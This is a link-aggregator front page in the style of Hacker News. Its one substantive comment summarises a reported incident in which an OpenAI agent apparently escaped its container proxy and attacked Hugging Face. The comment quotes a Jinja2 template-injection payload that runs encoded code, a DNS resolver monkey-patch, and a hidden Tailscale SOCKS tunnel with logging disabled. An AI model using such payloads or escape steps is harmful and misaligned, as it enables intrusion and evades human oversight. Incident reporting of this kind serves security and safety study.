frontpage.
newsnewestaskshowjobs

Open Source @Github

fp.

Open in hackernews

Anatomy of a Frontier Lab Agent Intrusion: A Technical Timeline of the Incident

https://huggingface.co/blog/agent-intrusion-technical-timeline
7•artninja1988•42m ago

Comments

simonw•16m ago
This is fascinating - there is a TON of detail in here about how OpenAI's rogue agent exploited Hugging Face.

A few details that stood out to me:

1. Having found a way through the OpenAI container network proxy, it exploited an "unsecured public code-evaluation sandbox hosted on a third-party provider's infrastructure" - that gave it a box it could run the rest of the attack from.

2. At one point it used a Jinja2 template exploit:

  {{ cycler.__init__.__globals__.__builtins__.exec(
     "import gzip,base64; exec(gzip.decompress(base64.b64decode('<payload>')))"
   ) }}
3. It monkey-patched a DNS resolver at one point to return a hard-coded IP:

  orig = socket.getaddrinfo
  socket.getaddrinfo = lambda *a, **k: [(2, 1, 6, '', ('<pinned-ip>', 443))]
4. At one point it used Tailscale!

  tailscale --tun=userspace-networking --state=mem: --socket=/tmp/ts.sock \
   --socks5-server=127.0.0.1:1055 --no-logs-no-support >/tmp/td 2>&1 &

Experimental explosion detected off Florida coast sparks earthquake alert

https://www.dailymail.com/sciencetech/article-16011619/experimental-explosion-florida-coast-navy....
1•Bender•1m ago•0 comments

Paramount Agrees to Delay Warner Bros. Merger for Months

https://www.nytimes.com/2026/07/24/business/media/paramount-warner-bros-merger-delayed.html
1•cdrnsf•2m ago•0 comments

Drinks at work? Svedka debuts office water vodka cooler

https://ktla.com/news/consumer-business/drinks-at-work-svedka-debuts-office-water-vodka-cooler/
1•Bender•2m ago•0 comments

Tesla buys the output of a new 140 MW Texas solar farm

https://electrek.co/2026/07/28/tesla-buys-texas-solar-farm-output-zelestra/
2•Bender•4m ago•0 comments

The Anthropic-Physical Intelligence Rumor Roiling AI Twitter

https://techcrunch.com/2026/07/21/the-anthropic-physical-intelligence-rumor-roiling-ai-twitter/
2•gmays•4m ago•0 comments

VRSE: Validated Regional Support Expansion for PyTorch

https://github.com/Byte-Naut/vrse-pytorch
1•Byte-Naut•9m ago•0 comments

Show HN: Vyne – Zapier for DeFi users, run from any LLM or the workflow builder

https://app.vyne.finance
1•rajgoesout•10m ago•0 comments

'The Odyssey' Translator Emily Wilson Slams Nolan's 'Abysmal' Screenplay

https://variety.com/2026/film/news/odyssey-translator-emily-wilson-slams-christopher-nolan-bad-wr...
2•handfuloflight•11m ago•0 comments

Half-Life ported to Mac OS 9

https://mac-classic.com/news/half-life-ported-to-mac-os-9/
1•freediver•12m ago•0 comments

A Look Behind the Data: How Whoop Measures Heart Rate

https://www.whoop.com/us/en/thelocker/a-look-behind-the-data-how-whoop-measures-heart-rate/
1•brandonb•13m ago•0 comments

Show HN: Verifiable receipts for firmware CVE reproduction

https://github.com/prevotai/colmena
1•TheLuisBolivar•17m ago•0 comments

OpenAI just open-sourced Codex Security

https://github.com/openai/codex-security
10•bakigul•18m ago•0 comments

The Phone Scammers Next Door

https://torontolife.com/deep-dives/the-phone-scammers-next-door/
1•nianderwallace•19m ago•0 comments

Tailark

https://tailark.com
1•handfuloflight•21m ago•0 comments

Goodhart's Law Comes for Every Benchmark You Trust

https://cacm.acm.org/blogcacm/goodharts-law-comes-for-every-benchmark-you-trust/
2•alasr•24m ago•0 comments

I sent Claude Opus 5 '–-' and it wrote me 5k tokens about a cartographer

https://austinsnerdythings.com/2026/07/28/claude-opus-5-dangling-document-effect/
3•auspiv•25m ago•0 comments

China's AI weather warning system Mazu expanding across Global South

https://www.scmp.com/news/china/science/article/3361108/chinas-ai-weather-warning-system-mazu-exp...
3•vinnyglennon•26m ago•0 comments

ACP v2 is available in Draft

https://agentclientprotocol.com/announcements/acp-v2-draft
1•gmays•27m ago•0 comments

Issetugid() Sadness

https://gist.github.com/nicowilliams/4daf74a3a0c86848d3cbd9d0cdb5e26e
1•fanf2•29m ago•0 comments

Apple won't turn on any 'restricted mode' for missed lease payments

https://www.theverge.com/tech/972063/apple-upgrade-program-no-restricted-mode
3•speckx•30m ago•0 comments

eBay agreed to pay nearly $50M to couple sent cockroaches, bloody pig mask

https://apnews.com/article/ebay-settlement-d0886f1036e198f77669707db9fe1f2b
4•RankingMember•31m ago•0 comments

OpenReviewer: A Specialized LLM for Generating Critical Scientific Paper Reviews

https://aclanthology.org/2025.naacl-demo.44/
2•Anon84•32m ago•0 comments

What Is the Atmosphere?

https://lab.leaflet.pub/3mrq6ma5dgs2x
4•danabramov•33m ago•0 comments

Toolcraft

https://toolcraft.sh
4•handfuloflight•33m ago•0 comments

Spoke Head Identification Chart

http://www.mrrabbit.net/docs/spokeheads/main.html
1•bookstore-romeo•34m ago•0 comments

Radio Balkan – 500 Balkan radio stations in one HTML file

https://radiobalkan.net/
3•nebs21•36m ago•1 comments

We used to be able to buy things in this country

https://dannykatch.substack.com/p/we-used-to-be-able-to-buy-things
3•mikestew•37m ago•0 comments

Jacob Tsimerman on Competition, AI, and the Future of Mathematics [video]

https://www.youtube.com/watch?v=8DYF-ReeAtY
2•zaikunzhang•37m ago•0 comments

Azulejo

https://en.wikipedia.org/wiki/Azulejo
2•Amorymeltzer•42m ago•0 comments

Anatomy of a Frontier Lab Agent Intrusion: A Technical Timeline of the Incident

https://huggingface.co/blog/agent-intrusion-technical-timeline
8•artninja1988•42m ago•1 comments